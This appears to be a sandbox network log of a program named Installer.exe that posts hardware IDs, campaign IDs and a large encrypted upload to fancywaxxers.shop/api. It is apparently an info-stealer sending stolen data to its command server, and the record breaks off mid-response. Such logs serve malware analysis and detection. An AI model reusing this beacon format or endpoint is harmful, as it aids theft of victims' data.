Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	104.21.32.1	443	7480	C:\Users\user\Desktop\Installer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:41:03 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IHGZGOG8TVYWXZ9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20424 Host: fancywaxxers.shop
2025-01-05 18:41:03 UTC	15331	OUT	Data Raw: 2d 2d 49 48 47 5a 47 4f 47 38 54 56 59 57 58 5a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 45 34 42 35 30 43 46 31 32 37 43 45 31 39 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 49 48 47 5a 47 4f 47 38 54 56 59 57 58 5a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 48 47 5a 47 4f 47 38 54 56 59 57 58 5a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 36 36 36 32 34 32 38 31 38 0d 0a 2d 2d Data Ascii: --IHGZGOG8TVYWXZ9Content-Disposition: form-data; name="hwid"68E4B50CF127CE1929072D93766B97C1--IHGZGOG8TVYWXZ9Content-Disposition: form-data; name="pid"3--IHGZGOG8TVYWXZ9Content-Disposition: form-data; name="lid"yau6Na--1666242818--
2025-01-05 18:41:03 UTC	5093	OUT	Data Raw: 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: M?lrQMn 64F6(X&7~`aO
2025-01-05 18:41:04 UTC	1137	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:41:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=81duulb3kchbm52uo5goq13bif; expires=Thu, 01 May 2025 12:27:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FBcvhxuXSkOxeoBqq5mJiETMiNvc1tpY1Y%2BZejxNwDMs%2FJ5%2BPcddLVejA6YFMGgt7Y3TMY%2FUDWLnJOHIdJBHCC84Q83sGkUC4KrrEb3olueYO0zGtkmMBA5mgMZzHQLovhcMqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd599af9a1941a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1582&rtt_var=607&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21384&delivery_rate=1781574&cwnd=239&unsent_bytes=0&cid=eb28db944a99cd71&ts=776&x=0"
2025-01-05 18:41:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:41:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.32.1	443	7480	C:\Users\user\Desktop\Installer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:41:05 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QVONRDKT5AL3UHL4IY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1005 Host: fancywaxxers.shop
2025-01-05 18:41:05 UTC	1005	OUT	Data Raw: 2d 2d 51 56 4f 4e 52 44 4b 54 35 41 4c 33 55 48 4c 34 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 45 34 42 35 30 43 46 31 32 37 43 45 31 39 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 51 56 4f 4e 52 44 4b 54 35 41 4c 33 55 48 4c 34 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 56 4f 4e 52 44 4b 54 35 41 4c 33 55 48 4c 34 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 36 36 36 32 Data Ascii: --QVONRDKT5AL3UHL4IYContent-Disposition: form-data; name="hwid"68E4B50CF127CE1929072D93766B97C1--QVONRDKT5AL3UHL4IYContent-Disposition: form-data; name="pid"1--QVONRDKT5AL3UHL4IYContent-Disposition: form-data; name="lid"yau6Na--16662
2025-01-05 18:41:05 UTC	1138	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:41:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fgicldf2u9cl45m9lm51tl879b; expires=Thu, 01 May 2025 12:27:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYMiSbgrC%2F%2Bhah22%2B2Z%2F4dDYGV9JXDtqNETpIw2ZeiK4JspUlTC4WfBie9msxUJdqUYsi7fky0KtIL3ovZ%2BA6sDgx4hDf0lCzbycKKPozZXcIWJVu3Zp0wucz%2FL%2BA3y9CTRqdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd599b7bd2b41a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1610&rtt_var=606&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1923&delivery_rate=1802469&cwnd=239&unsent_bytes=0&cid=5e5b389cdfeaa32c&ts=507&x=0"
2025-01-05 18:41:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:41:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.32.1	443	7480	C:\Users\user\Desktop\Installer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:41:06 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SH0IYEGY6AP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572005 Host: fancywaxxers.shop
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: 2d 2d 53 48 30 49 59 45 47 59 36 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 45 34 42 35 30 43 46 31 32 37 43 45 31 39 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 53 48 30 49 59 45 47 59 36 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 48 30 49 59 45 47 59 36 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 36 36 36 32 34 32 38 31 38 0d 0a 2d 2d 53 48 30 49 59 45 47 59 36 41 50 0d Data Ascii: --SH0IYEGY6APContent-Disposition: form-data; name="hwid"68E4B50CF127CE1929072D93766B97C1--SH0IYEGY6APContent-Disposition: form-data; name="pid"1--SH0IYEGY6APContent-Disposition: form-data; name="lid"yau6Na--1666242818--SH0IYEGY6AP
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: 91 6d 1a e6 b9 27 69 eb fe d8 4e b7 9b 87 8f 46 d3 a2 70 88 70 e5 fe 8e 8d 0d 7b 11 6a c6 f2 96 2f 87 58 45 82 15 8c a9 aa 88 d3 b4 cc ce 07 5b b7 e2 c6 03 12 4b d8 13 4c 2b 70 4d 40 ef 68 ea 29 70 cd 1e 96 59 44 17 7d 1b 2e 11 71 73 6a f4 6b 70 e3 93 58 d4 dd 74 48 76 51 fb 8c ce c8 15 d6 10 3e 4b d1 e1 e2 56 48 a6 c1 e2 a2 b7 c6 18 0a 3f fb cd 12 32 35 ce f5 47 e9 ee 4f 83 cb b3 7d f7 91 3a 03 b2 0f 53 e3 40 8d 7c d7 25 b0 3e b2 e5 70 4d 00 44 1d 4a e5 26 eb 8f cc 5d 55 3b 4e 9e 6a 79 21 81 57 02 52 de dc 8f c5 3f 04 7c 00 b7 ad 3c 6f d4 92 7d 69 0a 81 02 a7 ff a3 84 49 fd 47 11 05 01 af b1 b0 28 32 ec c8 5d c8 1f 50 65 90 46 d7 e2 6b d1 5d 31 a2 09 43 18 90 21 81 a0 20 39 88 ed 0f 88 4a 3c df 96 18 a7 00 07 f6 33 ba 21 f8 ff ee c1 ea 92 02 c2 ab d2 f0 Data Ascii: m'iNFpp{j/XE[KL+pM@h)pYD}.qsjkpXtHvQ>KVH?25GO}:S@\|%>pMDJ&]U;Njy!WR?\|<o}iIG(2]PeFk]1C! 9J<3!
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: fd 04 7b 9e 85 77 7c af 5f 1b b4 79 84 1d 29 7b c0 cf ab dd c1 1a 7f f1 27 f7 fe ba 4a 3a 90 a9 f2 7c d1 5a 0c ba 14 43 a4 0c 10 e7 0d 2a f9 57 4f b7 62 87 14 47 be 46 85 eb 21 5b 24 42 94 09 7b e0 fc ef 65 41 39 38 04 e2 c7 64 a8 ed 92 48 e4 9d 42 cb 3d 12 bb 84 09 b4 b6 e0 23 bf 0f 5e 91 ed bd a8 73 cd 36 e8 fe 70 45 61 4b 4d b5 49 68 a2 1a e1 5f a8 e6 33 88 fa 21 45 2b 5a db e2 e5 84 db 02 54 75 f1 71 e8 93 58 94 a5 86 0f ee ed 55 22 ff 26 4d b8 08 7b b9 93 e1 87 d6 46 83 6f 8f 9e c1 87 27 dc 56 07 73 e8 dd b3 c1 35 ce fe 9c ef fe 45 2f 6e 56 74 f7 fb b6 9d 99 3b 56 59 5e d3 7f 6c 24 0c 8f 94 64 4b 03 c4 a6 bd 6f f7 af b9 c6 fc a6 db f5 44 7a 99 8a fd 42 59 0c bf bb 41 52 90 12 e4 6b cd 4b f8 fe f3 1f ae 57 04 20 6f 3c 4b 97 7d 77 4b 3d 9a de 9c 2a 92 Data Ascii: {w\|_y){'J:\|ZCWObGF![$B{eA98dHB=#^s6pEaKMIh_3!E+ZTuqXU"&M{Fo'Vs5E/nVt;VY^l$dKoDzBYARkKW o<K}wK=
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: b6 09 f0 54 e7 d7 3d 7b 2b 12 94 f0 a5 bd fa f4 fd 90 a6 4d 4e 0c 12 29 7d e3 36 cd 82 d3 3c b8 f0 7f 8d 83 a4 dd 80 9b 11 dd 0a 09 7d a1 d1 98 4a 1c 0f 4e 50 b8 35 bf 01 a2 32 8e ea b3 93 5f 09 87 b8 e0 81 d6 c2 47 a6 de da 6b 40 c7 e6 7e db 84 de e7 06 19 a8 68 9b ec 7a ec e2 5f c3 4f c5 80 1a 8c 23 b9 21 68 a6 2d 47 57 aa 52 ef e7 03 29 40 db 73 91 b1 16 87 a0 66 58 dc 8c 86 d3 7e 24 90 c7 58 79 be 91 51 5a c5 f7 17 ff b2 9e 04 66 a2 6d a3 54 5b 3a 7c 27 8f f0 ef c8 f2 1c 94 ab 38 1a dd 55 d2 c5 03 1e 7f 87 f2 bd 85 b6 3f 84 96 f3 43 39 6e eb 72 35 44 e4 e2 09 7b 0a 77 e7 23 e9 30 37 9e c8 0e 98 ed 1d 0e 5c 72 70 e2 66 94 c2 b0 5c 33 27 92 13 fc e1 14 57 04 56 2e 55 87 d9 ac d7 66 9d c4 cf b5 34 a4 7b 8e 98 82 16 3f 65 74 3e 41 ce 15 c0 37 60 cc ef d2 Data Ascii: T={+MN)}6<}JNP52_Gk@~hz_O#!h-GWR)@sfX~$XyQZfmT[:\|'8U?C9nr5D{w#07\rpf\3'WV.Uf4{?et>A7`
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: 7c 80 7d 87 09 cd 82 63 a5 28 68 5a 3c db 4e 28 5e 2c 94 f2 e6 86 53 7d 90 2f 93 cd c5 04 c1 91 3d 4d a5 41 3e cc df 9c 99 cd 95 56 b3 36 35 ce 98 5a 2f b5 a1 ba 89 87 a9 36 54 57 4a 9a a7 d2 47 8f a3 89 0b 96 b0 77 07 60 e7 ba 33 9a 09 11 e4 fe 3a 77 69 81 ed ef 67 08 0b 5b 81 5d 6a 06 e2 df 7c ff 57 f5 39 d3 97 8f 0e c3 88 61 43 81 67 00 41 84 b9 7d f9 8a af 8c 20 52 90 43 10 b3 3e e4 a7 22 f2 b6 2e 5a a0 dd 60 d2 e5 fb a3 c8 91 05 88 9c 10 0e e5 c3 86 ee 7d af dd 4c 56 2f 99 f9 7f 87 c0 21 a0 ef 08 23 5a f3 d6 9e 75 53 cf bc 2c 46 34 c0 b1 99 88 1f 07 10 2d 02 c7 26 e7 dd 79 39 6e f3 0e b9 93 38 88 a9 b6 c8 b6 33 3b c7 f8 81 a8 0e 08 1e 6e d8 eb de be 49 d6 bf db 9c 8e 82 20 b2 0a 87 7c 36 b7 26 52 48 74 7a c5 88 ba 3f ef aa 08 fe 91 c0 d5 7a 32 27 4c Data Ascii: \|}c(hZ<N(^,S}/=MA>V65Z/6TWJGw`3:wig[]j\|W9aCgA} RC>".Z`}LV/!#ZuS,F4-&y9n83;nI \|6&RHtz?z2'L
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: 79 8f d2 27 fb 79 05 4c 9b 64 1e 05 35 19 b5 24 1f d8 18 30 f5 48 e3 14 bd f6 20 76 4c 07 f2 6b 62 98 22 1f 33 6e 69 62 96 3f 1e 57 d2 29 45 1a 66 3e c4 68 2c 38 d2 0d 72 ef f5 d8 20 c9 34 6a 7b 7a a1 5f f6 c0 f9 2e 82 6d 97 5c 3d d3 53 02 14 f0 60 6a 31 40 c6 00 af f9 22 43 54 9c 41 c1 29 30 ac 30 30 ba 2a e3 10 37 40 13 d4 90 2a 86 01 94 75 f4 d7 0e 64 81 29 d1 ab 06 41 7e 1e bb 6d c1 92 17 a4 6d 5a 2d 2d 01 8d 9b 8d fb a6 69 3e 9f fc 0d 41 73 68 e9 b8 d4 4c b9 82 69 8a d7 f6 42 1c f7 2f e5 55 73 07 28 b6 01 cf 96 32 1f c2 94 8a 59 86 4b 5b 6d 2b e9 53 61 41 7e 0e 7d 21 51 a8 b1 06 76 66 23 57 56 e3 96 a3 52 6e 76 2a 1e 33 19 dd b8 27 91 19 65 e9 e0 29 38 19 4b b9 ba ab b8 73 69 41 b4 22 63 6e c4 5c f7 82 4d bf c2 ae ed 31 4f 7f 2d 99 1d 9a ec 7f 4a e1 Data Ascii: y'yLd5$0H vLkb"3nib?W)Ef>h,8r 4j{z_.m\=S`j1@"CTA)0007@ud)A~mmZ--i>AshLiB/Us(2YK[m+SaA~}!Qvf#WVRnv*3'e)8KsiA"cn\M1O-J
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: 75 3b e7 f6 f3 36 a0 94 f7 6f e1 8f c3 af 69 c1 be e7 ae d6 6f a4 49 13 14 09 cb c9 77 15 bf a5 9a 51 33 30 c6 c3 e5 1d 5b e9 f3 6a 23 ac 0b e4 3a 89 5c 64 c9 4c 99 2b 6d 1f c5 d7 0f 0f 5f 2d 4b de b3 77 89 ed 59 20 9f 56 11 b5 be 1f 29 34 78 60 36 6e 0a ea fc 35 11 f2 9c 18 98 80 ce 78 e2 10 1e bc 4f e2 b4 ad 6f 98 57 c7 9f 5a 97 9a 90 a3 5c 59 e7 18 04 11 be 22 9c 5b 94 c4 3b 79 57 d6 2e 70 91 29 cf 63 90 2f 52 8d 22 87 e8 d6 6f fd 7a 0d 39 d3 52 54 d8 75 af b7 f3 22 92 0a db 22 22 59 75 93 2e 94 8d 08 0b 5a 68 81 6e 35 ba e2 69 d2 cf 23 eb c2 e0 f7 c4 58 6a 12 59 df 0b 3b f4 ca fd ea ec 39 ba e9 7c fa 67 fb 46 7c 5b 64 0e ca 60 f6 42 5c c6 39 4a e4 0d 85 b0 60 0c 4c c5 4e 96 90 e4 da 7d e3 35 d0 b9 da af 73 b4 7b 62 1b f5 a3 81 e3 19 88 48 27 ce 5e aa Data Ascii: u;6oioIwQ30[j#:\dL+m_-KwY V)4x`6n5xOoWZ\Y"[;yW.p)c/R"oz9RTu"""Yu.Zhn5i#XjY;9\|gF\|[d`B\9J`LN}5s{bH'^
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: 64 77 95 9b 3b 5f ca 6d 7c 34 4d 5a f3 f5 85 ce 93 e0 44 76 02 db 28 b9 39 01 20 8d fa 79 7d 8e 8b df 0d b1 c2 3c 72 02 86 28 dd 19 06 96 40 51 d9 72 b8 4f ad 4d 49 cf c2 c0 e4 cd fa c7 0c 6d 41 21 5f b3 3d 3a e1 ac c6 0b 98 56 49 25 aa fa 03 78 4d 0e 88 b3 05 84 f5 42 da 0e cd 18 d4 da 38 58 2f 4d 4c f9 ee 64 6d 59 1a 67 95 4b 2a a2 c9 fb 3f c8 18 ad 56 a0 34 b7 c7 c6 d2 2e d8 49 c6 8f 25 b0 92 0d 27 d5 28 6e e7 df b6 4e 10 57 8f 22 50 fc 77 77 f4 37 20 20 fe ea 0a 88 17 4e fd 4e 91 23 fd 4a 1b 6b cb 12 c1 7b 72 99 7b 01 cd 9d 8f ef 03 6e ad 30 14 60 5a 3e 2a fe 76 dd b3 8e 81 0a 79 f0 33 b8 b4 71 1e 75 70 76 ac 24 ec 45 31 39 c5 8b 33 9d 90 3c 0d 62 f1 52 94 2e d6 a3 17 d9 45 64 69 b7 ff 29 5a b6 22 89 0f d5 3b e2 f2 af 15 d1 a5 24 be b8 39 a6 ad 64 77 Data Ascii: dw;_m\|4MZDv(9 y}<r(@QrOMImA!_=:VI%xMB8X/MLdmYgK?V4.I%'(nNW"Pww7 NN#Jk{r{n0`Z>vy3qupv$E193<bR.Edi)Z";$9dw
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: 6b 1d 8b 3c 5b 2e 28 16 d9 50 68 f7 f0 c7 cf 3a 96 2c 48 fd a4 90 0e a5 45 47 5e 4d d0 c0 cb 3f 0d 17 db 9c b9 45 38 ca e8 5c 8c bc 89 13 3a e5 56 07 22 f6 0a 76 35 b4 13 9a 6e 7f e5 23 8a 41 d9 16 f0 8f df 79 7e 24 d9 6f db 4f b5 d9 2f 1b 02 3b fd 52 f6 5d af bb 3a 83 81 f1 39 78 ce 82 74 3f c5 e1 bb 6f 01 ea c5 8d 26 33 6d 92 de d4 3d 4f a1 f8 0e 96 d9 bc 04 c9 f7 05 9b 15 8f 9c 93 25 26 b1 85 45 2f 9d 1c a2 ec 8f 22 58 15 89 a1 84 11 e7 e9 0a c9 ca 82 14 3d 59 6d 56 82 a7 a6 39 16 6b 9b 7f da a5 72 5b 14 fb e7 00 da 11 14 72 23 47 4c 72 4e 6f 1f 1f 9f 4f 8d e8 f6 4c 3a a1 50 b1 c3 9a e1 32 33 c7 1a 9b 63 5c c4 2d fa f9 64 57 22 b8 d9 c5 29 b4 14 8e 68 86 55 10 fb 17 1e e8 6d 1f d9 b6 de d4 5d 81 3f 15 06 b3 e3 10 3b d1 4c 41 af 72 c1 43 e2 27 18 0a 1b Data Ascii: k<[.(Ph:,HEG^M?E8\:V"v5n#Ay~$oO/;R]:9xt?o&3m=O%&E/"X=YmV9kr[r#GLrNoOL:P23c\-dW")hUm]?;LArC'
2025-01-05 18:41:06 UTC	15331	OUT	Data Raw: 38 d9 8b 75 6d 72 db 55 3a 88 e7 e9 c2 de 31 c6 13 21 b5 41 19 fc cd 7c 16 69 ae 79 4a eb de 45 31 2a 6d 87 71 bb 04 aa 02 da ff dd 5f 05 27 e4 1a 4d ce a9 4d 07 7a e9 3c c3 60 34 79 1d 7c 42 d1 67 09 a5 c4 59 cc a2 95 07 4f 6c ce 11 2f 33 a3 58 aa 43 31 66 7e fe d5 2b e8 bb ab e2 1d 9e 7c 01 33 70 7a 14 fd 6b 6b 6c 00 53 2f 80 bd a7 b1 1e 4f ae 24 2d 27 01 16 58 f2 5d 21 60 c3 c9 0a 34 91 b9 d9 1e af a3 30 0d 84 19 c4 bc a1 d1 40 49 66 8c 3d 2d a4 6e 34 8f 56 5e ae aa 60 f5 b9 49 94 46 5b a1 ab 2a ac 4d c5 86 49 5f b0 60 56 ff 52 e2 37 cf 29 9b e5 92 4a 9f b7 cf 56 be 8b 30 a4 a9 d7 b5 85 cc 19 c1 16 74 a3 5f f4 87 d7 0c 0a 46 cb fa eb fc a2 69 ef 56 73 af 82 53 0f 5d 51 a0 7f f3 17 7d 3b a9 f7 64 7c bb 53 f5 bb 12 76 98 9b eb f9 42 5a a4 b7 4b 6f 80 09 Data Ascii: 8umrU:1!A\|iyJE1mq_'MMz<`4y\|BgYOl/3XC1f~+\|3pzkklS/O$-'X]!`40@If=-n4V^`IF[MI_`VR7)JV0t_FiVsS]Q};d\|SvBZKo
2025-01-05 18:41:08 UTC	1141	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:41:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bm9plq49d59igndqqtq6rtvagu; expires=Thu, 01 May 2025 12:27:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PtSknI398BdqKwdPS2xQQ7DShZlrFiwXYjLIoGAlHLRyWapwvngB70VF20Omm5g%2BR5%2BnU2WB7UG35rVzImrrIKZqPx7p3%2F%2FIszwPCE%2FUo2LAlZTc3fxagDHdAY3hgE3cAd7Uw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd599c0fca01875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1656&rtt_var=636&sent=302&recv=595&lost=0&retrans=0&sent_bytes=2842&recv_bytes=574546&delivery_rate=1698662&cwnd=153&unsent_bytes=0&cid=7f72e27b333ca972&ts=1675&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	104.21.32.1	443	7480	C:\Users\user\Desktop\Installer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:41:08 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: fancywaxxers.shop
2025-01-05 18:41:08 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 31 36 36 36 32 34 32 38 31 38 26 6a 3d 26 68 77 69 64 3d 36 38 45 34 42 35 30 43 46 31 32 37 43 45 31 39 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--1666242818&j=&hwid=68E4B50CF127CE1929072D93766B97C1
2025-01-05 18:41:09 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:41:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ka2ggk68b52rj2fuai37abvicu; expires=Thu, 01 May 2025 12:27:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3dJsZAs5oK6hhhjFqHyA5krVF9APa6XzUCuQ4tw1d%2B3AvD2anCGGUL3MIciVDllMVJ4q%2BTq%2BidKx%2Byzsd6SiLSHd240jL4tHPTkNYOej0zPTCMdGkGPj4PFuaxuh%2BJrCUUeHNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd599ce2e4e1875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1687&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=988&delivery_rate=1685912&cwnd=153&unsent_bytes=0&cid=21273ae0b52ea0cc&ts=507&x=0"
2025-01-05 18:41:09 UTC	236	IN	Data Raw: 33 36 35 38 0d 0a 31 35 4a 4d 49 77 77 4a 30 35 47 56 54 42 6b 64 4f 34 44 4a 77 72 4c 65 45 35 55 35 4b 6f 6f 56 43 41 34 49 37 62 57 46 67 55 4b 4d 36 57 35 46 65 43 76 70 6f 4c 6c 75 66 44 38 42 73 65 58 67 31 76 77 70 74 77 78 68 33 33 49 34 50 45 66 56 32 74 2f 71 4b 4b 66 62 47 30 74 4a 52 61 75 6e 31 41 68 44 4e 6d 72 4f 71 71 66 4b 6c 6d 66 62 56 55 66 45 63 48 46 43 58 35 6e 6b 78 75 41 79 69 37 31 39 53 56 68 51 6f 65 6a 39 49 55 70 34 55 4f 69 6f 68 2b 4f 6f 57 2f 70 34 5a 4f 51 67 53 54 39 77 32 76 44 67 73 58 47 41 79 33 30 55 52 58 32 79 6f 4e 51 47 62 45 35 58 79 59 65 4d 32 4b 68 59 30 6d 4e 6a 76 45 5a 4f 59 56 71 75 6a 65 44 6d 41 2b 58 30 4a 32 64 55 51 61 44 44 6f 68 68 44 52 31 Data Ascii: 